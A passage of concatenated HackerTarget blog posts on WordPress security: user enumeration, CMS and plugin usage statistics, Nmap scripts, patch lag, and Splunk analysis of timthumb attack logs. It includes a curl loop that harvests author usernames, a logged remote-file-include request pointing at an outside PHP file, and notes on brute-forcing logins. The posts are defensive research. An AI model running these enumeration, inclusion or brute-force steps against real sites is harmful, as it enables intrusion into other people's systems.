Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Date: Thu, 17 Oct 2019 23:12:26 GMT
Location: https://wordpressexample.com/author/fred/
Server: nginx/1.10.3 (Ubuntu)

for i in {1..5}; do curl -s -L -i http://www.wordpress-site-to-test.com/?author=$i | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z\-\.]*|Location:.*" | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done

https://wordpressexample.com/wp-json/wp/v2/users

The post WordPress User Enumeration appeared first on HackerTarget.com.

CMS Detection Methodology

The methodology used to determine the underlying technology of web sites is to search for specific strings within the HTML, or the HTTP Headers provided by the web server. For WordPress, our process is a simple matter of downloading the headers and page source from all sites in the Alexa top 1 million sites. The resulting content was then searched for /wp-json/, /wp-includes/ or /wp-content/ indicating a WordPress powered site.

No guarantee is made to the accuracy of this data. The accuracy comes down to what we found in the source.

CMS Usage in the Top 1 Million Sites

Here, we compare WordPress against its rival content management systems. It is clear to see WordPress is well out in front in 2019.

The popularity of WordPress gets quoted in everything from marketing materials to security incident reports. It is nice to see that the often quoted 30% figure is close even when counting the worlds highest traffic sites.

Web Servers of the Top 100K WordPress Sites

These statistics are based on the front-end web server delivering the WordPress site to the browser. The results are based on the initial HTTP header (Server:).

In the following chart, the total number for the web server technology is the focus.

Keep in mind the front-end servers powering Cloudflare are Nginx based, and the growing openresty is also built on Nginx. Putting Nginx well out in front as the technology of choice serving the page to the browser. No doubt one of the reasons it was recently acquired by F5 Networks.

More than a handful of sites are running on Microsoft based IIS servers (1275). Included in this number are WordPress powered Microsoft Corporation properties such as Visual Studio.

A closer look at the Cloudflare statistics

Cloudflare continues to be very popular among WordPress administrators. 21.6% of the world's top 100K WordPress sites being served by Cloudflare on front end.

In this breakdown of the WordPress sites being served by cloudflare sites, we can see Cloudflare has grown by a couple of percent since our last analysis performed in 2017.

Don't forget your PHP Upgrades

The latest update to WordPress Core checks the PHP version and will fail if the minimum PHP 5.6.20 is not running. This is interesting when we look at the PHP version within use in the top WordPress sites.

In the HTTP Header responses, we found the PHP version leaking in 28729 sites (28.7%) of the top 100'000. This was found in the X-Powered-By header or in the extended Apache Server Header. The end of life chart shows the percentage of sites within the 28.7% where the version was leaked.

Keep in mind that anything before PHP/7.1 is End of Life and not supported at all from the PHP project - even for critical security patches.

Analysis of installed WordPress Core Version

Looking into the WordPress version goes hand in hand with understanding the security posture of a site. Since the release of WordPress 3.7, automatic updates have been available for WordPress installations.

WordPress Security recommends always run the latest version of WordPress core to ensure security fixes are applied.

There are different ways to determine the version Check out our guide on Attacking WordPress Sitestest of a WordPress installation. For simplicity, only sites with the default Meta Generator banner are included in this break down of versions found. The default generator tag was found on 60009 of the top 100K WordPress sites.

Quite a spread of versions can be seen! Those WordPress 2.x sites really do exist (WordPress 3.0 was released June 2010). There are currently 527 sites running 2.x and 616 sites running WordPress 3.x. This is about 15% less than 2017, so thankfully there are no new 2.x or 3.x installations!

Just over a third of all the sites are running the latest version 5.2.1 (this was the latest version at time of analysis - 3rd June 2019). Version 5.2.1 had been out for 2 weeks at this time.

Only 37.2% of these high traffic sites are running the latest version (2 weeks after release).

All this indicates a lack of standard maintenance procedures on the majority of sites. Administrators still need to improve the adoption of best practice security maintenance processes.

WordPress Hosting Providers

Crunching the numbers for the hosting of the WordPress sites, we simply resolved the IP address of the site. From the IP address, the network block owner was determined by running a simple ASN lookup.

The results show the owner of the hosting net block which is often the hosting provider. Note: some hosting companies may not own the IP block. In these cases, large networks such as Amazon (AWS) and Google (GCP) will include smaller hosting companies.

Managed WordPress Hosting

While the ASN's listed above show the locations of the sites within network blocks, there are also managed WordPress hosting providers whose services sit within some of these ASN's.

For example, the statistics for the Google ASN include the managed hosting provider Kinsta who utilizes Google Cloud for their services.

The data for these managed hosting providers has been pulled from HTTP headers, where clues exist in the server header or other custom headers.

Hosting Locations

Everyone loves a good map. Utilizing the Maxmind GeoLite data the IP address locations were plotted against the list of 100'000 top WordPress sites.

As you can see, either a few sites are running on submarines in the Indian Ocean or, the IP Geolocation data is not 100% accurate. The general distribution of sites around the world is interesting, with expected clusters in the data centres within the USA and Europe.

Network Services

Using passive scan data from Internet wide scanning data sets, we can correlate with our list of WordPress sites and determine common network services.

Interesting to see that nearly 10% of the top sites are running SSH on port 2222 or 22222.

It seems server owners do not like SSH password bots smashing away all day and night and filling their log files.

Are 36% of the top 100000 WordPress sites updating files using the unencrypted FTP protocol? Let's hope not. It is, of course, possible to use FTP over TLS/SSL, and this can be configured to work over port 21. Let's hope all those high value sites are using encrypted communication.

IPv6 Adoption in the Top WordPress Sites

The rollout of IPv6 continues to crawl at a slow pace in most parts of the world. This is evident by the fact only 23.6% of the world's highest traffic WordPress installation have IPv6 enabled on server.

Google has statistics indicating they are seeing 29% of traffic being IPv6 globally. Maybe its time that web site owners jumped on the IPv6 wagon.

WordPress Plugin and Theme Analysis

Analysis of WordPress plugins is limited to those that are detectable through passive analysis. In this instance, passive analysis is through examination of a regular web request and parsing the HTML and HTTP headers. More aggressive plugin detection can be achieved through brute-forcing plugin paths. Check out our guide on Attacking WordPress Sites However, this generates thousands of web requests and is only used by malicious actors and vulnerability scanning tools.

SEO Plugins

When it comes to improving the SEO of a WordPress site, there are two plugins that come to mind;

1. WordPress SEO by Yoast
2. All in One SEO.

The nice thing about these plugins is they put a comment in the HTML source, allowing it to be identified. Recently, a new contender has entered the scene - SEO Framework. According to the stats, it has plenty of ground to cover to catch up.

Compared to 2017, Yoast SEO has really hit the accelerator now with 82% of the install base (of sites running an SEO plugin).

Identification was performed by checking for the plugins default comment. Of course it is possible that some sites have removed the comment.

WordPress Caching Plugin Showdown

Fast sites make users happy. They also make Google happy following the update to the search algorithm that takes site speed into account. Understandably these factors make WordPress Caching Plugins a popular choice for most serious sites.

The most popular caching plugins include comments in the HTML (by default) identifying the plugin in use. By searching for these comments, it was possible to gather numbers for the most popular caching plugins.

Top 25 WordPress Plugins

The numbers become a bit rougher when determining the plugins in use. Unless the plugin has a default comment in the code, such as the SEO plugins and caching plugins, it gets a bit harder to determine plugins in use.

Many plugins load resources from the plugin folder (css or js), and this is the best way to identify plugins used passively.

So to determine the Top 25 plugins listed below, the HTML was searched for /wp-content/plugins/$plugin/. Then the plugin names were extracted simply using the path. An additional caveat: it is now common for javascript and css to be minified to improve site performance. If minified code is in use, this method of identifying plugins no longer works.

Top 25 WordPress Themes

Using a similar methodology as the above plugin identification, we were able to identify the WordPress theme in use. Searching for the path /wp-content/themes/$theme/ in HTML and counting the most common occurrences. Many sites will use custom themes and have changed the path, however, identification of the most common should be fairly accurate using the large sample size.

It is interesting to note that even the default themes (twentysixteen, twentyseventeen) that ship with WordPress make an appearance in the list. Showing that a flashy theme does not make the site, content matters.

 Article first published in 2012. Most recently updated June 2019.

The post Analysis of Top 100K WordPress Sites appeared first on HackerTarget.com.

NMAP NSE Scripts for WordPress

http-wordpress-info.nse

Rather than brute forcing paths, this script is much more polite and will only download the main page of the WordPress site and examine the theme and plugin paths in the html. The WordPress version will also be identified using the default readme.html file if the meta generator is not present.

http-wordpress-enum.nse

The http-wordpress-enum.nse script comes with default Nmap installation and allows you to attempt to identify users of the WordPress installation. Once you have user names it is possible to brute force the passwords using methods I detailed in the attacking wordpress article.

Hacker Target NMAP-nse-scripts for WordPress

http-wordpress-plugins.nse

Deprecated as http-wordpress-enum.nse updated to include this functionality,

In addition to identifying the plugins in use, I added a feature to the http-wordpress-plugins.nse script that will identify the version of the installed plugin and compare that to the latest version that is checked in real time against the WordPress Plugin API.

-- Interesting ports on my.woot.blog (123.123.123.123):
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-wordpress-plugins:
-- | search amongst the 500 most popular plugins
-- |   akismet 3.0.4 (latest version: 3.0.4)
-- |   wordpress-seo 1.7 (latest version: 1.7.1)
-- |   disqus-comment-system 2.83 (latest version: 2.84)
-- |_  wp-to-twitter 1.2 (latest version: 1.45)

http-wordpress-themes.nse

Deprecated as http-wordpress-enum.nse updated to include this functionality,

Based on the NSE script http-wordpress-plugins.nse I created out a variation that tests for WordPress themes. One of the often overlooked parts of keeping a secure WordPress installation is ensuring all themes (even inactive ones) are kept up to date or removed if not in use. Security vulnerabilities can be found in WordPress themes and these are often exploitable even if the theme is inactive.

The wp-theme.lst was created after I crawled the Alexa top 1 million sites and found around 200000 WordPress sites. By basing the theme list on the in use themes and sorting by popularity this list is a good representation of the most popular themes in being used across the web.

-- Interesting ports on my.woot.blog (123.123.123.123):
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-wordpress-themes:
-- | search amongst the 500 most popular themes 
-- |   twentyfourteen 1.3
-- |   canvas 5.8.7
-- |_  twentytwelve 1.5

The post WordPress Security Testing with Nmap appeared first on HackerTarget.com.

Background on the Vulnerabilities

W3 Total Cache and WP Super Cache two of the WordPress communities most popular plugins were found to have a code execution vulnerability. An exploit that enables code execution is about as bad as it gets. New releases of the plugins were released on the 18th of April.

Six weeks after the release of the new plugins I dumped the HTTP Headers of the Internet's 100'000 most popular websites to get an understanding of how quickly web site administrators are applying critical web application patches.

A typical HTTP Header response from a site running WordPress and W3 Total Cache can be seen here. Notice the X-Powered-By Header, and the version of W3 Total Cache (0.9.2.4). Oops! We found a vulnerable site!

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 May 2013 21:10:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 46122
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Mon, 06 May 2013 20:45:07 GMT
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 06 May 2013 21:10:37 GMT
X-Powered-By: W3 Total Cache/0.9.2.4
MS-Author-Via: DAV
Vary: Accept-Encoding,Cookie

W3 Total Cache Version Analysis

W3 Total Cache was found to be running on 1310 sites out of 99590 that responded and 834 sites were found to be running WP Super Cache.

In a word its a massive FAIL. These web sites are the most highly trafficked in the world and only 44.7% have upgraded W3 Total Cache to the latest version. 724 websites are currently still vulnerable with code execution possible.

The WP Super Cache Header does not reveal the version number however it is likely that there is a similar percentage of vulnerable sites running that caching plugin.

Recommendations on Patching WordPress

Guides for securing WordPress are plentiful and patching is only part of that process. Keep in mind that managing a secure WordPress installation is an on-going process, the system needs to be maintained and updates applied as soon as possible after release.

One of the most surprising things about these results is the lack of security patch management in the top WordPress sites. It is to be expected that with literally millions of WordPress installations, finding vulnerable systems would be not hard, however the fact that there does not appear to be security patch management processes in place for even the high traffic sites is quite astonishing.

The post Top WordPress sites vulnerable 6 wks after plugin patch released appeared first on HackerTarget.com.

Back in August 2011, a serious vulnerability was discovered in many popular WordPress themes and Plugins. The code enabled automatic thumbnail creation when publishing with the WordPress content management system. While not a part of the WordPress core, the code had been reused by many developers, including both commercial and free theme builders.

The critical vulnerability is a remote file include (RFI) which allows an attacker to have the thumb.php code include additional code to execute PHP on the web server. An attacker attempts to use this vulnerability to execute commands on the web server.

So widespread was the vulnerability that attackers have been compromising WordPress installations for the past 18 months and continue to do so. Just yesterday, my OSSEC host-based intrusion detection system alerted me to continued attempts at exploiting the timthumb vulnerability.

Example

Below is an attack example from my logs. Note the WordPress path being attempted, the theme name, and the ?src= is the URL of the remote include PHP code.

61.246.x.x - - [02/Feb/2013:18:33:28 +0000] "GET /wordpress-themes-in-top-1-million-websites/wp-content/themes/suffusion/timthumb.php?src=http://picasa.com.c        t.ro/wordpress.php HTTP/1.1" 404 36 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"

Anyone who has patched the vulnerability with updated code is not affected by these ongoing attempted attacks. They simply fill your web server log files with attempts to execute thumb.php on various common paths resulting in 404 not found errors.

What is Splunk?

If your job involves looking at logs, spend some cycles playing with the Splunk Search engine. It is a commercial product but comes in a free version that allows you to consume 500mb of logs per day. Great for performing ad-hoc analysis or small to mid-size projects.

To perform some simple analysis of my web server logs to view the frequency, sources and attempts to exploit this timthumb vulnerability, I have turned to Splunk.

Feeding Splunk a year of Timthumb Attacks

Timthumb Events per month over 1 year

To begin, I installed Splunk and fed it a single file. The file contained 12 months worth of logs from my Nginx web server. I used grep to only feed log entries that included thumb in the path and resulted in a 404 not found. In other words, every log event that I have in my Splunk instance is a single attempt to exploit the timthumb vulnerability.

Since the data in my Splunk instance is only made up of timthumb exploit attempts, the initial search string shows all the attempts per month over the 12 months.

source="/home/fred/nginx-logs/access-complete-thumb.txt"

It is clear from this simple query that even though the initial vulnerability was released in August 2011, there was a major jump in the number of attacks against my server from July 2012. The reason for the increased number of attempts appears to be an increase in the tested paths of the timthumb code (more known bad themes). These lists are then included in the attack scripts.

Where did the attacks come from?

Using the Splunk GeoIP APP it is a simple matter to determine where the attacks are coming from. Once you have the base lookup working, Splunk makes it easy to chart the results of the top countries or cities.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | lookup geoip clientip | top 20 client_country

This query shows the Top 20 countries for total number of attacks.

Since some of these IP addresses are sending thousands of attempts, I take a closer look at the number of unique IP addresses by location. Instead of a simple chart, I use the Google Map APP that allows the geolocations to be plotted onto a Google Map. Using a map takes this visualization to the next level. A great way to impress the boss with a couple of clicks!!

From a quick look at the map it is apparent that there are no timthumb hackers in Mongolia.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | stats count by clientip | geoip clientip

Top attacking IP Addresses

Piping the search into top 20 clientip shows the top attacking IP address as 178.25.214.92 with 2445 events. Click on the IP address and it easy to see all attempts from this IP occurred during an 8 minute window on the 30th of August 2012. Whois shows this IP address is a broadband connection in Germany.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | top 20 clientip

source="/home/fred/nginx-logs/access-complete-thumb.txt" clientip="178.25.214.92"

Most Attacked WordPress Themes

To extract the most popular themes that are being attacked I used a regex on /wp-content/themes/ to get the theme path. Many of the attacked themes in the top 20 correlate with the most popular WordPress themes in the Top 1 million websites.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | rex field=_raw "wp-content\/themes\/(?[\w\-]*)" | top 20 wptheme

Looking at the most attacked WordPress themes, I discovered some attacks were not "blind" attempts. They were targeted against my theme that I have on a non-standard path. This indicates my site was explicitly targeted either manually after extraction of the path from the HTML source of my page or by a script parsing the HTML for those attempts. 31 different IP addresses had a go at my non-default theme path. In the top 5, I found 3 web hosting net blocks (Sweden, Germany and the USA), a Greek university and two Tor exit nodes.

source="/home/fred/nginx-logs/access-complete-thumb.txt" uri_path="/wp-content/themes/delegate2.3/functions/thumb.php" | top clientip

I have only scratched the surface of what is possible when using Splunk to analyse your web logs for attacks and other issues. Install it, start playing, and you will not be disappointed. For those who are wary of the Splunk price tag for larger amounts of data, I suggest taking a look at ELSA and GreyLog2. Both are open source log management systems that seem promising and are developing rapidly.

The post There are no WordPress Timthumb Hackers in Mongolia appeared first on HackerTarget.com.

An essential security maintenance function of any WordPress install is performing regular updates. Many people do update the WordPress Core and Plugins; also, it is just as important to update to the latest version of all installed WordPress Themes. Any themes you are not using should be removed.

Examples

29th April 2012 - an exploit was released for the Woothemes Framework. This exploit allows possible code execution through the short code preview function. Version 5.3.10 resolved the issue, but additional fixes were applied to make 5.3.12 the recommended version to stay secure.

August 2011 - an exploit was released for an image function called "timthumb"> This exploit affected many WordPress themes as it was a popular function included with many frameworks, and standalone themes (this not only applied to woothemes).

There have been two critical security vulnerabilities in the past year that affected Woothemes framework based sites. As we see in the charts below, even those websites with significant levels of web traffic appear to have little knowledge or no regard for security updates to WordPress themes.

Research

As we use Woothemes here at HackerTarget.com, we researched a bit further into the woothemes frameworks in the top 1 million websites. The following statistics show the breakdown of the Woothemes Framework versions in use.

WooFramework Versions Compared

This chart shows the detected WooFramework versions of WordPress installs in the top 1 million websites. A total of 2476 Woo Powered sites were detected; note that this only includes sites that have the metagenerator tag enabled.

The next chart shows a simple breakdown of the sites, with the latest version; compared to sites with older versions of the Woothemes Framework. It would not be an unreasonable assumption to predict that many of the 1699 websites with an older version are indeed vulnerable to known security exploits.

Data was collected in mid May; only 31% of Woothemes sites were running the latest version of the framework.

Disabling the Metagenerator Tag

These statistics have been determined by searching for the Metagenerator Tag in the html source. It is easy to remove this information from your Woothemes installation as shown in the following image.

Disabling the metagenerator tag is a good way to remove what security people like to call information disclosure. This is information leakage that allows an attacker to more easily find ways to break into a system. You will, of course, still need to keep all your WordPress bits and pieces up to date; to avoid becoming a victim.

The post Woothemes Framework Update Analysis appeared first on HackerTarget.com.

Methodology

To determine themes in use by the world's most popular WordPress based websites, a search of the source html from the primary page was analysed for wp-content/themes/. This is a good indication of a WordPress installation, and also reveals the theme in use.

As expected from a free open source content management system, of the 160438 sites we found with WordPress themes, many are running free themes, but many are also running premium commercial themes.

Top 5 Premium WordPress Theme Providers

To determine the commercial themes in use, the 100 most popular themes have been counted (35930 total wordpress sites). Of the 100 most popular themes, 51% were premium or commercial themes. This clearly shows how significant the WordPress "economy" is in the world of web development.

Of the commercial themes, Thesis Theme Framework, StudioPress, Woothemes, OptimizePress and Elegant themes were the top 5 providers in the 100 most popular themes.

It is interesting to note the high number for the OptimizePress theme. This is a single purpose theme, whereas the others in the Top 5 are all theme frameworks. OptimizePress is very much a sales-focused theme, using techniques such as "funnels" and "squeeze pages" to push users into a sales pitch. It shows that WordPress is much more than just a blogging platform.

Woothemes has the most popular general purpose commercial theme with its "canvas" theme coming in at number 16.

Free themes are of course very popular with the top 2 themes come bundled with WordPress default installations (twentyten and twentyeleven).

Summary of the Top 20 WordPress Themes

1.		Twentyten The default WordPress theme for 2010, it just so happens to be the most popular wordpress theme in the top 1 million websites. Total Sites: 3096
2.		Twentyeleven The default WordPress theme for 2011, and hot on the heels of 2010, this theme is the second most popular. Total Sites: 2793
3.		Thesis 18 This version of the Thesis theme framework comes in as the highest commercial listing. This entry is a theme framework, and not an individual theme. Total Sites: 1706
4.		Optimize Press This commercial theme is a very popular theme that is dedicated towards driving a visitor towards the sale of a product or sign-up. Total Sites: 1457
5.		Thesis 182 This is a later version of the Thesis theme framework and comes in as the third highest commercial listing. Note this is a theme framework, and not an individual theme. Total Sites: 1144
6.		Default This was the default theme for WordPress versions 1.5 up until 2.9. When browsing the web sometimes this old timer still pops up and these stats confirm that it is still kicking strong. Total Sites: 918
7.		Mystique First release was back in 2009, this theme has recently been moved into a Framework like core called Atom. Total Sites: 916
8.		Arras A clean magazine style theme that comes in multiple color variations. While the Arras theme is a Free download commercial child themes are being developed. Total Sites: 868
9.		Atahualpa Bytes for All have a handful of Free wordpress themes, Atahualpha being the most popular. Total Sites: 795
10.		Suffusion A versatile Free theme with a 5 star rating at the WordPress theme directory. Total Sites: 766
11.		Inove A popular theme that was last updated back in 2009. Are the sites running this getting no updates or do people just love this theme? Total Sites: 758
12.		Thesis 184 This commercial Framework makes another appearance with version 184. Note this is a theme framework, and not an individual theme. Total Sites: 726
13.		Graphene Another popular free theme, the developer actively offers paid customisation and support. Total Sites: 654
14.		Article Directory A popular example of a custom purpose theme. This turns your WordPress installation into a feature packed article directory. It is a commercial offering. Total Sites: 604
15.		Lifestyle A commercial theme from Studio Press. Works with the Genesis Framework. Total Sites: 581
16.		Canvas A commercial theme from Woothemes. Uses the Wooframework, this theme is designed to be highly customisable. Total Sites: 562
17.		News Another commercial theme from Studio Press makes an entry into the list. Uses the Genesis Framework. Total Sites: 500
18.		Magazine Basic A free theme from a now commercial theme house. Total Sites: 465
19.		Arthemia A commercial theme available from Colorlabs. Total Sites: 418
20.		Headway 2013 A commercial theme available from Headway themes. Total Sites: 409

Premium vs Free Themes in the Top 20

This shows a very different result to the statistic for the top 100. In the Top 20, only 35% are premium themes. This appears due to the large number of twentyten and twentyeleven themes in use.

WordPress.com Hosting in the Top 1 Million

Over at wordpress.com, you can get free hosting for a wordpress installation. They also offer a VIP hosting option for commercial-grade hosting. Looking at the theme paths we can see that 2.8% (4492) of the 160k wordpress sites are running on wordpress.com path /wp-content/themes/pub/ and 147 are running on wordpress.com in a paid for capacity /wp-content/themes/vip/.

Related Articles

• Infographic detailing various statistics of the Top 100K WordPress sites (March 2011)
• Analysis of Top 100K WordPress Sites
• Woothemes Framework Updates - Security Analysis (June 2012)

The post WordPress themes in top 1 million websites appeared first on HackerTarget.com.

Around the same time we have been putting a wordpress infographic that highlights some of the findings from our analysis of wordpress usage among the top 100K sites (as rated by Alexa).

WordPress Usage in the Top 100K Infographic

The post Top 100K Sites WordPress Usage Infographic appeared first on HackerTarget.com.

Our scan does not perform brute forcing of accounts, passwords or plugins. Brute Forcing is more appropriate in a targeted pen-test or black-box vulnerability assessment.

Simply put brute forcing:

• Plugins is achieved by testing URL's: http://myexampleblog.cm/wp-content/plugins/$pluginname
• Usernames can be brute forced with a POST request to the login form (Incorrect username)
• Passwords can be brute forced (with valid username) by hitting the login form

Additionally username's can also be gathered through some WordPress themes, RSS feeds, and author page URI's such as /blog/author/admin/.

These tools and scripts that can be utilized in your Penetration Testing of WordPress.

Metasploit has a module for enumerating usernames and brute forcing passwords. It is solid and convenient; everyone has Metasploit installed... don't they?

An NSE (nmap scripting engine) script was released for Nmap that does plugin brute forcing.

Just in the last few days a new tool hit the tubes wpscan. Still under development it does a few different checks including brute forcing for accounts.

All the tools referenced above are dedicated towards external testing of wordpress installations. There are other options that involve installation of plugins into the wordpress installations for deeper monitoring.

The post Security Testing WordPress appeared first on HackerTarget.com.

It had malware inserted into it that is of a much more malicious and spammy nature. Further investigation reveals that ALL of the themes on that site contain basically the same code. This code is not actually “viral”, but it’s definitely malware and it’s worth investigating to see some of the ways people try to hide their spam.

So today, I’m going to dissect it and serve it up on a platter for everybody to see.

Anatomy of a theme malware

Other excellent posts on this topic include:
Jaypee writes on WordPress Theme Malware
Analysis of Top Google Results for Free WordPress Themes

The post Malware in WordPress Themes appeared first on HackerTarget.com.